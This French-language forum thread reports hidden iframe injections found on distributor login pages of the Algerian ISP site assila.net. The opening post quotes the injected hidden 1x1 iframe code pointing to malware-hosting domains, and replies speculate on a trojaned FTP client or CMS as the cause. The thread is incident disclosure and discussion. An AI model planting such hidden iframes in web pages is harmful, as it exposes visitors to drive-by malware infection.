Aller au contenu
Règlement du forum ×
IPTV et arnaques ×

Le site assila.net (EEPAD) infecté par une injection de iframe


assilabox

Messages recommandés

Salam,

 

Suite au blackout eepadien de cette nuit, je me suis amusé a naviguer sur les sites d'eepad ...

 

Surprise! Une page du site www.assila.net (http://www.asila.net/distributeur.asila.net/index.php) est infectée par deux liens vers des sites malveillants.

 

La page infectée n'est ni moins ni plus que la page d'authentification des distributeurs d'eepad, ces derniers peuvent renouveler les abonnements des clients et accéder a la base de données clientèle de EEPAD, ce qui rend la faille infiniment grave!

 

Voici le code qu'on peut trouver sur cette page:

 

src="http://thedeadpit.com/?click=1923906"width=1 height=1 style="visibility:hidden;position:absolute">

src="http://internetcountercheck.com/?click=2834203" width=1 height=1 style="visibility:hidden;position:absolute">

Il s'agit, d'une tentative d'injection d'un logiciel ou code malveillant, les deux iframes tentent d'infecter tous les visiteurs qui consultent la page d'authentification des distributeurs d'eepad ou de détourner leurs requêtes d'authentification vers les sites : thedeadpit.com et internetcountercheck.com qui sont sur la blacklist de Google:

 

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=fr&site=http://thedeadpit.com/

 

 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

 

Parmi les programmes malveillants figuraient 35 trojan(s). En moyenne, l'infection a généré 0 nouveaux processus sur l'ordinateur cible.

This site was hosted on 257 network(s) including AS8708 (RDSNET), AS7132 (SBIS), AS30890 (EVOLVA).

 

 

 

Ce site a hébergé des programmes malveillants au cours des 90 derniers jours. Il a infecté 57 domaine(s), dont ncclassifiedonline.net/, rehberweb.com.tr/, el7ooob.com/.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=fr&site=http://internetcountercheck.com/

 

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

 

 

Parmi les programmes malveillants figuraient 5 trojan(s). En moyenne, l'infection a généré 0 nouveaux processus sur l'ordinateur cible. This site was hosted on 199 network(s) including AS8708 (RDSNET), AS9143 (AtHome Benelux BV), AS30890 (EVOLVA).

 

 

Ce site a hébergé des programmes malveillants au cours des 90 derniers jours. Il a infecté 10 domaine(s), dont prsena.com/, shayarinsms.com/, 140mp3.com/.

Je ne veux pas critiquer eepad ni polémiquer (j'en ai plus qu'assez) et vous demande de ne pas le faire aussi, ça ne sert a rien!

 

Je préfère que nous restions objectifs et que nous nous posions des questions sur la vulnérabilité elle même; ça nous aidera peut être a éviter ce genre d'attaque sur nos sites. Pensez vous que ça soit un ver qui se propage automatiquement? mais dans ce cas pourquoi il se trouverait uniquement sur la page d'authentification des distributeurs!

 

Dans le cas contraire (attaque ciblée) quelle est intérêt de internetcountercheck.com et thedeadpit.com a prendre la main sur le contenu de cette page? ou s'agirait-il d'outils de piratage hébergés sur ces sites qui permettaient a de tiers personnes de s'accaparer des comptes?

 

Plusieurs sites ont été déjà infectés par cette même vulnérabilité ce qui me laisse dire que c'est plutôt un Ver qui se propage automatiquement, mais pourquoi il a touché uniquement cette page du site assila? le répertoire /distributeur.asila.net/ est vulnérable?

 

A vous!

Modifié par assilabox
Lien vers le commentaire
Partager sur d’autres sites

A première vue c'est des injections auto de sites vulnérables. Mais je ne connais pas quel service ou quel rôle joue ces "distributeurs" d'Eepad.

 

Si c'est ciblé, c'est pluôt un "offre de service" de ce site (dans l'iframe) au "attaquants" intéressés par le service d'Eepad.

Lien vers le commentaire
Partager sur d’autres sites

A première vue c'est des injections auto de sites vulnérables. Mais je ne connais pas quel service ou quel rôle joue ces "distributeurs" d'Eepad.

 

Si c'est ciblé, c'est pluôt un "offre de service" de ce site (dans l'iframe) au "attaquants" intéressés par le service d'Eepad.

 

Les distributeurs d'EEPAD c'est ce que appel eepad les Cybers partenaires, en cherchant sur le site assila.net je tombe sur la liste des Cybers partenaires et je tombe encore sur une page vulnérable!

 

Une autre page du même service est infectée! il s'agit de la page http://www.assila.net/cyber_partenaire.html

 

Curieux! Non?

 

Affaire a suivre...

Lien vers le commentaire
Partager sur d’autres sites

chez toutes les sociétés visité, et ou j'ai eu à intervenir, la cause est:

 

l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch.

il ajoute automatiquement le ifram aux fichiers php envoyé sur le serveur lors de l'upload.

 

en ce qui concerne les société de presse écrites arabophones, c'etait un cms vivvo , il y avait une version patché avec un trojan a l'interieur qui fait cela.

 

A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes.

c'est ce qui m'est arrivé, lors de la dernière vague sur les sites de la presse écrite arabophone.

 

il parait que c'est moi qui fait cela , et puis je téléphone pour gagner de l'argent.

"paroles d'un très haut responsable chargé de la cyber criminalité en Algérie".

 

mais quand je vois le webmaster de zataz aller presque en prison pour avoir alerter une société je m'attend a encore plus en Algérie.

 

n'importe quoi......

Lien vers le commentaire
Partager sur d’autres sites

chez toutes les sociétés visité, et ou j'ai eu à intervenir, la cause est:

 

l'utilisation de logiciel pour le transfert ftp professionnel et le ifram est dans le patch. il ajoute automatiquement le ifram aux fichiers php envoyé sur le serveur lors de l'upload.

 

Ce qui expliquerait la chose, la personne chargée de la partie "distributeurs" dans le site web utiliserait un logiciel de FTP cra-cké ... et pourtant filezilla ou autres existent!

 

en ce qui concerne les société de presse écrites arabophones, c'etait un cms vivvo , il y avait une version patché avec un trojan a l'interieur qui fait cela.

 

A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes. C'est ce qui m'est arrivé, lors de la dernière vague sur les sites de la presse écrite arabophone.

 

il parait que c'est moi qui fait cela , et puis je téléphone pour gagner de l'argent."paroles d'un très haut responsable chargé de la cyber criminalité en Algérie".

 

C'est triste!

Lien vers le commentaire
Partager sur d’autres sites

Ce qui me dérange le plus dans ces hitoires de hack, c'est le manque de réactivité.

 

On peut comprendre qu'on a fait une "erreur" ce qui a comme résultat la compromission du site par exemple. Mais, ne pas détecter ça après des jours et ne pas réagir 'es vraiment grave.

 

Alors Eepad (le PDG), avant de parler de cybercriminalité et donner des conseils au autres, nettoyez de grace devant votre porte !!

 

Si j'étais AT ou un autre ISP, je ferais un petit article dans se sens avec mes "amis" journalistes ;)

Lien vers le commentaire
Partager sur d’autres sites

bien dit pour les journalistes, même ceux qui travaillent en algérie à partir du canada."il se reconaitra".

Dans le domaine des tic c'est un clan fermé qui se partagent les cadeaux des majors, à noter que cadeau peut être un paquet de marlboro.........".

Il n y a rien a attendre d'eux, et je pèse mes mots, soit ils signent un papier qui leur a été envoyé tous prêt, soit ils écrivent un papier bidon, pour mettre à la fin "comme le site algérien ..qu'il faut visiter d'urgence..." et en fin, soit ils vont sur internet et jouent du controle-V puis controle-C.

Dans la presse arabophone, les pro des tic sont quasiment inexistant, c'est généralement du copier coller.

 

et pour finir, je vais vous raconter une histoire vraie:

 

invité, moi et ma femme par l'ambassadeur de Pologne à une soirée qui était couverte par la presse, il y avait un buffet et ensuite des intervenants parlaient.

on était assis et derrière moi, il y avait une jeune journaliste qui parlait au téléphone, "on entendais tout" moi et ma femme.

"allo....allo....passez moi la rédaction.....ya djedeeeeeek....tu a raté.....youuuuuuu.......wahed el gato.......ma nahkilekch............."

la journaliste , a passé une demi heure au mobile à énumérer les gâteaux, le poisson et le jus sans alcool, qui a été précisé maintes fois par l'ambassadeur.

 

ce soir la, j'ai appris beaucoup sur la presse algérienne.

et je connais pratiquement tous les journalistes pseudo"TIC" de tous les journaux.

MAKANE WALOU

Lien vers le commentaire
Partager sur d’autres sites

  • 3 weeks later...
A noter, qu'il vaut mieux ne pas prendre contact avec la victime, si non on a des problèmes....

je partage votre avis :rolleyes: moi aussi j'ai eu des problemes un jour :D j'ai cru que sa ce passe comme au cinema... mais non en est les premier a etre accuser :mad:

 

aza2wz.jpg

Modifié par smed79
kaspersky update
Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

×
×
  • Créer...